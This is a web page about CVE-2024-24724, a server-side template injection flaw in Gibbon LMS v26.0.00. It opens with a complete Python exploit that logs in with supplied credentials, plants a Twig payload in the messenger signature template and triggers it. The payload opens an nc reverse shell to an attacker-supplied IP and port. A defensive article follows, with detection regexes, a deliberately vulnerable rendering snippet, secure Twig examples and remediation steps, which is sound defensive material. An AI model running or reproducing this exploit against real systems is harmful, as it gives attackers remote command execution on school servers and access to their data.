Gibbon LMS v26.0.00 - SSTI vulnerability

Exploit Author: Ali Maharramli,Fikrat Guliev,Islam Rzayev Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-04-02 
# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724

import requests
import re
import sys


def login(target_host, target_port,email,password):
     url = f'http://{target_host}:{target_port}/login.php?timeout=true'
     headers = {"Content-Type": "multipart/form-data; 
boundary=---------------------------174475955731268836341556039466"}
     data = 
f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
     r = requests.post(url, headers=headers, data=data, 
allow_redirects=False)
     Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
     if Session_Cookie[4] is not None and '/index.php' in 
str(r.headers['Location']):
         print("login successful!")

     return Session_Cookie[4]



def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
     url = 
f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
     headers = {"Content-Type": "multipart/form-data; 
boundary=---------------------------67142646631840027692410521651", 
"Cookie": cookie}
     data = 
f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; name=\"address\"\r\n\r\n/modules/School 
Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; 
name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo 
/tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} 
 >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"
     r = requests.post(url, headers=headers, data=data, 
allow_redirects=False)
     if 'success0' in str(r.headers['Location']):
         print("Payload uploaded successfully!")



def trigger(cookie, target_host, target_port):
     url = 
f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
     headers = {"Cookie": cookie}
     print("RCE successful!")
     r = requests.get(url, headers=headers, allow_redirects=False)


if __name__ == '__main__':
     if len(sys.argv) != 7:
         print("Usage: script.py <target_host> <target_port> 
<attacker_ip> <attacker_port> <email> <password>")
         sys.exit(1)
     cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
     rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
     trigger(cookie, sys.argv[1], sys.argv[2])


Gibbon LMS v26.0.00 — SSTI Vulnerability (CVE-2024-24724): Overview, Impact, and Remediation

This article explains the Server-Side Template Injection (SSTI) vulnerability discovered in Gibbon LMS v26.0.00 (CV E-2024-24724), the implications for affected deployments, how to detect exploitation attempts, and safe remediation and hardening steps. It focuses on practical, defensive guidance and secure coding patterns so system owners and developers can mitigate risk without reproducing exploit tooling.

Item Details
CVE CVE-2024-24724
Product Gibbon LMS
Affected version v26.0.00 (as reported)
Vulnerability type Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE)
Disclosure date January 2024 (reported)

What is SSTI and how it applied to Gibbon

Server-Side Template Injection (SSTI) happens when an application accepts template syntax from a user and renders it on the server using a templating engine (for example, Twig, Jinja-like engines, or similar). If untrusted input reaches the template renderer without restriction, an attacker can inject template expressions that execute on the server — possibly leading to data disclosure, privilege escalation, or remote code execution.

In the reported Gibbon case, a user-controlled field (for example, an administrative “signature” or template string stored and later rendered in a page) was processed by the template engine in a way that allowed evaluation of injected template expressions. That created an SSTI vector that could be leveraged for remote code execution in deployments where the template engine exposed unsafe filters/functions.

Impact and risk

  • High risk for administrative or authenticated endpoints: If an attacker can supply template content that is later rendered by the server, they may achieve arbitrary command execution.
  • Data confidentiality and integrity risks: SSTI can expose secrets, database content, and configuration files.
  • Persistence and lateral movement: An attacker with code execution can create backdoors, pivot within an internal network, or exfiltrate data.
  • Supply and operational disruptions: Exploitation could lead to ransomware, service interruption, or reputational damage.

Immediate actions for administrators

  • Apply vendor-supplied patches: Update Gibbon to the latest patched release as published by the project. This is the single most important step.
  • Restrict access: Temporarily restrict access to administrative modules (School Admin / messenger configuration) to trusted IP ranges while investigating.
  • Block egress: Implement or tighten outbound firewall rules to block unusual remote connections originating from web servers (prevent command-and-control or reverse shells from connecting out).
  • Rotate credentials and secrets: After containment, rotate administrative credentials, API keys, and any secrets that might have been exposed.
  • Check integrity and logs: Inspect logs for suspicious requests to the messenger settings endpoint and other admin pages; look for template delimiter tokens (e.g., "{{", "{%") in submitted data and for unexpected POSTs.

Detection and Indicators of Compromise (IoCs)

  • HTTP POST requests to messengerSettingsProcess.php or messengerSettings.php that include template delimiters such as "{{", "{%", or "{#" in form fields.
  • Unexpected changes to settings or stored templates (signature fields, message templates).
  • Outbound network connections from the web server to unusual IPs/ports shortly after administrative POSTs.
  • New scheduled jobs, files created in /tmp, or shells listening on uncommon ports.

Helpful (defensive) log-search patterns

Use these as starting points to detect suspicious submissions that may contain template expressions. These are defensive and intended to reduce false negatives; tune them to your environment.


# Example regex to find template delimiter patterns in web server logs
(\{\{|\{\%|\{\#)

Explanation: This simple pattern searches logs for the common template delimiters used by many template engines. Flag any administrative POSTs that include these tokens for further review. Do not assume all hits are malicious — some legitimate content may include these sequences — but treat them as worthy of inspection in admin contexts.

Safe coding and secure template handling

The root cause of SSTI is rendering untrusted template source. The correct security posture is:

  • Never render raw template syntax supplied by untrusted users.
  • If user-supplied content must be shown, treat it as data (escape it) rather than as template source.
  • Use a sandboxed template environment that disables dangerous tags, filters, and functions if dynamic templating of user-provided snippets is unavoidable.
  • Whitelist allowed operations, and avoid giving templates access to system functions or arbitrary filters that can call into OS commands or PHP functions.

Vulnerable pattern (illustrative, non-exploitable)


// Vulnerable pattern (illustrative)
// The code below demonstrates the risky pattern: rendering user input
// directly as a template source. Do not use this in production.
$userTemplate = $_POST['signatureTemplate'];  // untrusted
echo $twig->render($userTemplate, $context);

Explanation: Rendering a template string that came directly from a POST body allows an attacker to inject template expressions evaluated on the server. Avoid this pattern entirely.

Secure alternatives

Recommended safe approaches — examples show how to treat user content as data and/or how to sandbox template execution.


// 1) Treat user input as plain text (escape it) and render it into a safe, server-side template:
$userInput = $_POST['signatureTemplate'];
$safeSignature = htmlspecialchars($userInput, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
echo $twig->render('admin/signature_display.html.twig', ['signature' => $safeSignature]);

// 2) If you must evaluate templates from external sources, use a strict sandbox:
// Configure Twig's sandbox to restrict tags/filters/functions (pseudo-code)
use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;

$loader = new ArrayLoader([
    'user_snippet' => $userTemplateSafeSubset
]);

$allowedTags = ['for','if'];                 // minimal set
$allowedFilters = ['escape'];                // no system/exec filters
$allowedFunctions = [];                      // no functions
$policy = new SecurityPolicy($allowedTags, $allowedFilters, $allowedFunctions, [], []);
$twig = new Environment($loader);
$twig->addExtension(new SandboxExtension($policy, true));

echo $twig->render('user_snippet', $context);

Explanation: The first example escapes user input and renders it within a server-controlled template, preventing template engine evaluation of user content. The second example shows the idea of a sandboxed template engine: a security policy restricts tags, filters, and functions accessible from user-supplied templates. In most cases, the safest choice is to avoid evaluating user-supplied templates at all.

Patch verification and deployment checklist

  • Verify that your deployment has the vendor-published fix applied. Check version numbers and changelogs from the official Gibbon project or your distribution.
  • Confirm sensitive modules are accessible only to trusted accounts and IPs.
  • Perform a code review for other template-rendering entry points that accept or store user-supplied content.
  • Enable and review web application firewall (WAF) alerts for POSTs containing template tokens in admin contexts.
  • Harden server configuration and reduce the privileges of the web application user (file system and network egress limits).

Incident response playbook (high level)

  • Identify: search for suspected requests and anomalous outbound connections; gather logs and timeline.
  • Contain: isolate affected hosts, restrict admin interfaces, and block suspicious egress.
  • Eradicate: remove backdoors, apply patches, rotate credentials, and rebuild compromised hosts if integrity cannot be assured.
  • Recover: restore services from known-good backups; monitor for reinfection.
  • Lessons learned: perform a post-incident review and update secure-coding and deployment practices.

Long-term hardening recommendations

  • Adopt defensive coding standards: treat templates as code and content as data.
  • Use the principle of least privilege for application processes and credentials.
  • Deploy network-level egress controls for web hosts.
  • Use centralized logging and alerting to detect anomalous behavior early.
  • Regularly scan web applications and dependencies for known vulnerabilities and apply timely updates.

Concluding notes

SSTI vulnerabilities are high-risk when template engines are configured to evaluate user-supplied input. For Gibbon LMS administrators, the priority is to apply the vendor's patch, restrict access to administrative interfaces, and audit template handling code to ensure user content is never rendered as server-side templates. Developers should follow secure patterns: escape untrusted data, use sandboxed environments only when strictly necessary, and prefer server-side templates under developer control rather than templates supplied by end users.